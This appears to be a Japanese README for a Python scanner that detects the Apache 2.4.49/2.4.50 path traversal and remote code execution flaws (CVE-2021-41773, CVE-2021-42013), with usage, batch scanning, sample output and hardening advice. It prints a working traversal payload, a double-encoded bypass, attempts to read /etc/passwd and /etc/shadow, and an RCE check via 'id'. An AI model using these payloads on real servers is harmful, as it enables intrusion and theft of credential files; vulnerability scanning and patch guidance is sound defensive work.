
Apache HTTP Server 2.4.49 および 2.4.50 の CVE-2021-41773 および CVE-2021-42013 のパストラバーサルおよびリモートコード実行脆弱性を検出するための Python ベースのスキャナー。
CVE-2021-41773 および CVE-2021-42013 のパストラバーサルとリモートコード実行の脆弱性を、Apache HTTP Server バージョン 2.4.49 および 2.4.50 に対して検出する、Python ベースの包括的な脆弱性スキャナです。
CVE-2021-41773 と CVE-2021-42013 は、Apache HTTP Server に影響を与える重大な脆弱性であり、攻撃者に以下を可能にします:
これらの脆弱性は 2021 年 10 月に広く注目を集め、実際に活発に悪用されています。
.%2e)がディレクトリ制限を回避できる不適切なパス正規化/etc/passwd などの機密ファイルの読み取り、mod_cgi が有効な場合の任意のコマンド実行%%32%65)によるバイパスが可能✅ 二重 CVE 検出: CVE-2021-41773 と CVE-2021-42013 の両方をテスト ✅ パストラバーサルテスト: ファイルアクセス試行のための複数のペイロードバリエーション ✅ RCE テスト: mod_cgi が有効な場合のリモートコード実行の検証 ✅ バッチスキャン: ファイルから複数のターゲットをスキャン ✅ カラーコード付き出力: 見やすい整形された結果 ✅ カスタマイズ可能なタイムアウト: 不安定なネットワーク向けにリクエストタイムアウトを調整可能 ✅ User-Agent スプーフィング: 基本的なフィルタリング機構を回避
requests ライブラリcolorama ライブラリhttps://github.com/drackyjr/CVE-2021-42013.git
cd cve-2021-41773-42013
pip3 install -r requirements.txt
または手動でインストール:
pip3 install requests colorama
python3 cve_scanner.py -u http://192.168.1.100
python3 cve_scanner.py -u https://target.com
python3 cve_scanner.py -u http://target.com -t 15
python3 cve_scanner.py -l targets.txt
python3 cve_scanner.py -h
| Argument | Short | Type | Description |
|---|---|---|---|
--url | -u | STRING | ターゲット URL(例: http://example.com) |
--list | -l | FILE | ターゲットのリストを含むファイル(1 行に 1 つ) |
--timeout | -t | INTEGER | リクエストタイムアウト(秒)(デフォルト: 10) |
python3 cve_scanner.py -u http://192.168.1.100
targets.txt を作成:
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
次に実行:
python3 cve_scanner.py -l targets.txt -t 15
python3 cve_scanner.py -u http://target.com -t 30
スキャナは以下の詳細な出力を提供します:
出力例:
============================================================
CVE-2021-41773 / CVE-2021-42013 Vulnerability Scanner
============================================================
[*] Target: http://192.168.1.100
[*] Testing CVE-2021-41773 (Apache 2.4.49)...
[+] VULNERABLE to CVE-2021-41773!
[+] Payload: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
Scan Summary
============================================================
[!] Target is VULNERABLE!
[!] Immediate patching required!
[*] Recommendation: Upgrade to Apache HTTP Server 2.4.51 or later
============================================================
.%2e)を含むリクエストを送信/cgi-bin/、/icons/、/images//etc/passwd と /etc/shadow の読み取りを試行%%32%65)を含むリクエストを送信id コマンドを実行してコード実行を検証uid= と gid= を検索スキャナは以下を検出します:
/etc/passwd 由来の root: または daemon: エントリが含まれるid コマンド実行による uid= と gid= がレスポンスに含まれる<Directory />
Require all denied
</Directory>
# 機密ディレクトリへのアクセスを制限
<Directory /cgi-bin>
Require all denied
</Directory>
# 不要な場合はシンボリックリンクを無効化
Options -FollowSymLinks
# セキュリティヘッダーを有効化
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
# Apache バージョンを確認
apache2 -v
httpd -v
| Version | Status | Action |
|---|---|---|
| 2.4.49 | ❌ Vulnerable | Upgrade immediately |
| 2.4.50 | ⚠️ Partially Patched | Upgrade to 2.4.51+ |
| 2.4.51+ | ✅ Patched | No action needed |
⚠️ 重要: このツールは認可されたセキュリティテストおよび教育目的専用です。コンピュータシステムへの不正アクセスは、Computer Fraud and Abuse Act(CFAA)などの法律および世界各国の同様の法律の下で違法です。
認可された使用のみ:
不正使用の警告: ターゲットをテストする前に、明示的な許可を得ていることを確認する責任は利用者にあります。作成者は不正使用について一切の責任を負いません。
このスキャナは以下に最適です:
.
├── cve_scanner.py # Main scanner script
├── requirements.txt # Python dependencies
├── README.md # This file
├── targets.txt # Example target list
└── LICENSE # License information
requests==2.28.1
colorama==0.4.5
http://192.168.1.100
https://vulnerable.example.com
http://10.0.0.50:8080
解決策: -t オプションでタイムアウトを延長
python3 cve_scanner.py -u http://target.com -t 30
解決策: このスクリプトはデフォルトで SSL 検証を無効にします。問題が続く場合は、Python 証明書を更新してください:
pip3 install --upgrade certifi
解決策: すべての依存関係がインストールされていることを確認
pip3 install -r requirements.txt
解決策: スクリプトを実行可能にする
chmod +x cve_scanner.py
python3 cve_scanner.py -u http://target.com
-l を使用貢献を歓迎します! 貢献するには:
git checkout -b feature/improvement)git commit -m 'Add improvement')git push origin feature/improvement)以下を確認してください:
このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
セキュリティテストツール
教育および認可されたセキュリティテスト目的で作成されました。
質問、問題、提案については、GitHub で issue を開いてください。